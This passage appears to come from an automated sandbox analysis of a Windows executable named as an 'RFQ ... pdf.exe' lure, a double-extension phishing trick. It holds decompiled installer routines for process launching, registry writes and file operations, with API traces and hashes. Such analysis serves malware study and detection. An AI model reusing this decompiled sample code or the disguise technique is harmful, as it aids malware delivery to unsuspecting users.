                                                                        0x00401c6d
                                                                        0x00401c7b
                                                                        0x00401c83
                                                                        0x00401c86
                                                                        0x00401c86
                                                                        0x00401c6b
                                                                        0x00401cca
                                                                        0x00401ccd
                                                                        0x00401cd3
                                                                        0x004028d7
                                                                        0x004028d7
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                        • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                                                        • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                        • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00401E9C() {
                                                                        				void* _t15;
                                                                        				void* _t24;
                                                                        				void* _t26;
                                                                        				void* _t31;
                                                                        
                                                                        				_t28 = E00402A9A(_t24);
                                                                        				E00404D62(0xffffffeb, _t13);
                                                                        				_t15 = E00405247(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                        				 *(_t31 + 8) = _t15;
                                                                        				if(_t15 == _t24) {
                                                                        					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                        				} else {
                                                                        					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                                                        						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                                        							E00405CFC(0xf);
                                                                        						}
                                                                        						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
                                                                        						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                                                        							if( *(_t31 - 0x34) != _t24) {
                                                                        								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                        							}
                                                                        						} else {
                                                                        							E0040591D(_t26,  *(_t31 - 0x34));
                                                                        						}
                                                                        					}
                                                                        					_push( *(_t31 + 8));
                                                                        					CloseHandle();
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
                                                                        				return 0;
                                                                        			}







                                                                        0x00401ea2
                                                                        0x00401ea7
                                                                        0x00401eb2
                                                                        0x00401eb9
                                                                        0x00401ebc
                                                                        0x004026da
                                                                        0x00401ec2
                                                                        0x00401ec5
                                                                        0x00401ed6
                                                                        0x00401ed1
                                                                        0x00401ed1
                                                                        0x00401eeb
                                                                        0x00401ef4
                                                                        0x00401f04
                                                                        0x00401f06
                                                                        0x00401f06
                                                                        0x00401ef6
                                                                        0x00401efa
                                                                        0x00401efa
                                                                        0x00401ef4
                                                                        0x00401f0d
                                                                        0x00401f10
                                                                        0x00401f10
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                          • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                          • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                        • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                        • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 4003922372-47812868
                                                                        • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                        • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                                                        • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                        • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405247(CHAR* _a4, CHAR* _a8) {
                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                        				signed char _t10;
                                                                        				int _t12;
                                                                        
                                                                        				0x7a1588->cb = 0x44;
                                                                        				_t10 = GetFileAttributesA(_a8);
                                                                        				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
                                                                        					_a8 = 0;
                                                                        				}
                                                                        				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
                                                                        				if(_t12 != 0) {
                                                                        					CloseHandle(_v20.hThread);
                                                                        					return _v20.hProcess;
                                                                        				}
                                                                        				return _t12;
                                                                        			}






                                                                        0x00405250
                                                                        0x0040525a
                                                                        0x00405265
                                                                        0x0040526b
                                                                        0x0040526b
                                                                        0x00405283
                                                                        0x0040528b
                                                                        0x00405290
                                                                        0x00000000
                                                                        0x00405296
                                                                        0x0040529a

                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                        • CloseHandle.KERNEL32(?), ref: 00405290
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405247
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AttributesCloseCreateFileHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 2000254098-66219284
                                                                        • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                        • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                                                        • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                        • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004054CC(CHAR* _a4) {
                                                                        				CHAR* _t7;
                                                                        
                                                                        				_t7 = _a4;
                                                                        				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                        					lstrcatA(_t7, 0x409010);
                                                                        				}
                                                                        				return _t7;
                                                                        			}




                                                                        0x004054cd
                                                                        0x004054e4
                                                                        0x004054ec
                                                                        0x004054ec
                                                                        0x004054f4

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                                                        • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-3081826266
                                                                        • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                        • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                                                        • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                        • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00402386(void* __eax, void* __eflags) {
                                                                        				void* _t15;
                                                                        				char* _t18;
                                                                        				int _t19;
                                                                        				char _t24;
                                                                        				int _t27;
                                                                        				intOrPtr _t33;
                                                                        				void* _t35;
                                                                        
                                                                        				_t15 = E00402B61(__eax);
                                                                        				_t33 =  *((intOrPtr*)(_t35 - 0x14));
                                                                        				 *(_t35 - 0x30) =  *(_t35 - 0x10);
                                                                        				 *(_t35 - 0x44) = E00402A9A(2);
                                                                        				_t18 = E00402A9A(0x11);
                                                                        				 *(_t35 - 4) = 1;
                                                                        				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
                                                                        				if(_t19 == 0) {
                                                                        					if(_t33 == 1) {
                                                                        						E00402A9A(0x23);
                                                                        						_t19 = lstrlenA(0x40a418) + 1;
                                                                        					}
                                                                        					if(_t33 == 4) {
                                                                        						_t24 = E00402A7D(3);
                                                                        						 *0x40a418 = _t24;
                                                                        						_t19 = _t33;
                                                                        					}
                                                                        					if(_t33 == 3) {
                                                                        						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
                                                                        					}
                                                                        					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
                                                                        						 *(_t35 - 4) = _t27;
                                                                        					}
                                                                        					_push( *(_t35 + 8));
                                                                        					RegCloseKey();
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
                                                                        				return 0;
                                                                        			}










                                                                        0x00402387
                                                                        0x0040238c
                                                                        0x00402396
                                                                        0x004023a0
                                                                        0x004023a3
                                                                        0x004023b5
                                                                        0x004023bc
                                                                        0x004023c4
                                                                        0x004023d2
                                                                        0x004023d6
                                                                        0x004023e1
                                                                        0x004023e1
                                                                        0x004023e5
                                                                        0x004023e9
                                                                        0x004023ef
                                                                        0x004023f4
                                                                        0x004023f4
                                                                        0x004023f8
                                                                        0x00402404
                                                                        0x00402404
                                                                        0x0040241d
                                                                        0x0040241f
                                                                        0x0040241f
                                                                        0x00402422
                                                                        0x004024fb
                                                                        0x004024fb
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                        • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseCreateValuelstrlen
                                                                        • String ID:
                                                                        • API String ID: 1356686001-0
                                                                        • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                        • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                                                        • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                        • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00401F4B(char __ebx, char* __edi, char* __esi) {
                                                                        				char* _t21;
                                                                        				int _t22;
                                                                        				void* _t33;
                                                                        
                                                                        				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
                                                                        				_t21 = E00402A9A(0xffffffee);
                                                                        				 *(_t33 - 0x2c) = _t21;
                                                                        				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
                                                                        				 *__esi = __ebx;
                                                                        				 *(_t33 - 8) = _t22;
                                                                        				 *__edi = __ebx;
                                                                        				 *((intOrPtr*)(_t33 - 4)) = 1;
                                                                        				if(_t22 != __ebx) {
                                                                        					__eax = GlobalAlloc(0x40, __eax);
                                                                        					 *(__ebp - 0x34) = __eax;
                                                                        					if(__eax != __ebx) {
                                                                        						if(__eax != 0) {
                                                                        							__ebp - 0x44 = __ebp + 8;
                                                                        							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
                                                                        								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
                                                                        								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
                                                                        								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                        							}
                                                                        						}
                                                                        						_push( *(__ebp - 0x34));
                                                                        						GlobalFree();
                                                                        					}
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
                                                                        				return 0;
                                                                        			}






                                                                        0x00401f50
                                                                        0x00401f53
                                                                        0x00401f5b
                                                                        0x00401f60
                                                                        0x00401f65
                                                                        0x00401f69
                                                                        0x00401f6c
                                                                        0x00401f6e
                                                                        0x00401f75
                                                                        0x00401f7e
                                                                        0x00401f86
                                                                        0x00401f89
                                                                        0x00401f9e
                                                                        0x00401fa4
                                                                        0x00401fb7
                                                                        0x00401fc0
                                                                        0x00401fcc
                                                                        0x00401fd1
                                                                        0x00401fd1
                                                                        0x00401fb7
                                                                        0x00401fd4
                                                                        0x00401be1
                                                                        0x00401be1
                                                                        0x00401f89
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                        • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                          • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1404258612-0
                                                                        • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                        • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                                                        • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                        • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E004021F6() {
                                                                        				void* __ebx;
                                                                        				char _t33;
                                                                        				CHAR* _t35;
                                                                        				CHAR* _t38;
                                                                        				void* _t40;
                                                                        
                                                                        				_t35 = E00402A9A(_t33);
                                                                        				 *(_t40 + 8) = _t35;
                                                                        				_t38 = E00402A9A(0x11);
                                                                        				 *(_t40 - 0x64) =  *(_t40 - 8);
                                                                        				 *((intOrPtr*)(_t40 - 0x60)) = 2;
                                                                        				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
                                                                        				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
                                                                        				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
                                                                        				lstrcatA(0x40a418, _t38);
                                                                        				 *(_t40 - 0x5c) =  *(_t40 + 8);
                                                                        				 *(_t40 - 0x58) = _t38;
                                                                        				 *(_t40 - 0x4a) = 0x40a418;
                                                                        				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
                                                                        				E00404D62(_t33, 0x40a418);
                                                                        				if(SHFileOperationA(_t40 - 0x64) != 0) {
                                                                        					E00404D62(0xfffffff9, _t33);
                                                                        					 *((intOrPtr*)(_t40 - 4)) = 1;
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
                                                                        				return 0;
                                                                        			}








                                                                        0x004021fc
                                                                        0x00402200
                                                                        0x00402208
                                                                        0x0040220e
                                                                        0x00402211
                                                                        0x0040221e
                                                                        0x0040222f
                                                                        0x00402233
                                                                        0x0040223a
                                                                        0x00402243
                                                                        0x0040224b
                                                                        0x0040224e
                                                                        0x00402251
                                                                        0x00402255
                                                                        0x00402266
                                                                        0x0040226f
                                                                        0x004026da
                                                                        0x004026da
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • lstrlenA.KERNEL32 ref: 00402218
                                                                        • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                        • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                        • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                        • String ID:
                                                                        • API String ID: 3674637002-0
                                                                        • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                        • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                                                        • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                        • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040555F(CHAR* _a4) {
                                                                        				CHAR* _t3;
                                                                        				char* _t5;
                                                                        				CHAR* _t7;
                                                                        				CHAR* _t8;
                                                                        				void* _t10;
                                                                        
                                                                        				_t8 = _a4;
                                                                        				_t7 = CharNextA(_t8);
                                                                        				_t3 = CharNextA(_t7);
                                                                        				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                        					if( *_t8 != 0x5c5c) {
                                                                        						L8:
                                                                        						return 0;
                                                                        					}
                                                                        					_t10 = 2;
                                                                        					while(1) {
                                                                        						_t10 = _t10 - 1;
                                                                        						_t5 = E004054F7(_t3, 0x5c);
                                                                        						if( *_t5 == 0) {
                                                                        							goto L8;
                                                                        						}
                                                                        						_t3 = _t5 + 1;
                                                                        						if(_t10 != 0) {
                                                                        							continue;
                                                                        						}
                                                                        						return _t3;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					return CharNextA(_t3);
                                                                        				}
                                                                        			}








                                                                        0x00405568
                                                                        0x0040556f
                                                                        0x00405572
                                                                        0x00405577
                                                                        0x0040558a
                                                                        0x004055a4
                                                                        0x00000000
                                                                        0x004055a4
                                                                        0x0040558e
                                                                        0x0040558f
                                                                        0x00405592
                                                                        0x00405593
                                                                        0x0040559b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040559d
                                                                        0x004055a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004055a0
                                                                        0x00000000
                                                                        0x00405580
                                                                        0x00000000
                                                                        0x00405581

                                                                        APIs
                                                                        • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 0040556D
                                                                        • CharNextA.USER32(00000000), ref: 00405572
